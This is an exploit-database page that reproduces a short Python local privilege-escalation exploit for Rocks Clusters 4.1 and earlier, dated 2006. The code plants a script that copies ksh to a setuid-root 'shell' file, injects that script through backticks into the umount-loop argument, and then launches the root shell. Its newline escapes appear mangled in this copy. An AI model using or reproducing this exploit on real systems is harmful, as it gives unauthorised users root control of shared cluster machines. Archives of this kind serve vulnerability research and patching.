Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Rocks Clusters <= 4.1 (umount-loop) Local Root Exploit
# Published : 2006-07-15
# Author : Xavier de Leon
# Previous Title : Linux Kernel 2.6.13 <= 2.6.17.4 prctl() Local Root Exploit (logrotate)
# Next Title : Rocks Clusters <= 4.1 (mount-loop) Local Root Exploit

#!/usr/bin/env python
##############################################################################
##  rocksumountdirty.py: Rocks release <=4.1 local root exploit
##  quick and nasty version of the exploit. make sure the . is writable and
##  you clean up afterwards. ;)
##
##  coded by: xavier@tigerteam.se [http://xavsec.blogspot.com]
##############################################################################
x=__import__('os');c=x.getcwd()
open('%s/x'%c, 'a').write("#!/bin/shncp /bin/ksh %s/shellnchmod a+xs %s/shellnchown root.root %s/shelln" % (c,c,c))
print "Rocks Clusters <=4.1 umount-loop local root exploit by xavier@tigerteam.se [http://xavsec.blogspot.com]"
x.system('umount-loop "`sh %s/x`"'%c);x.system("%s/shell"%c)

# www.Syue.com [2006-07-15]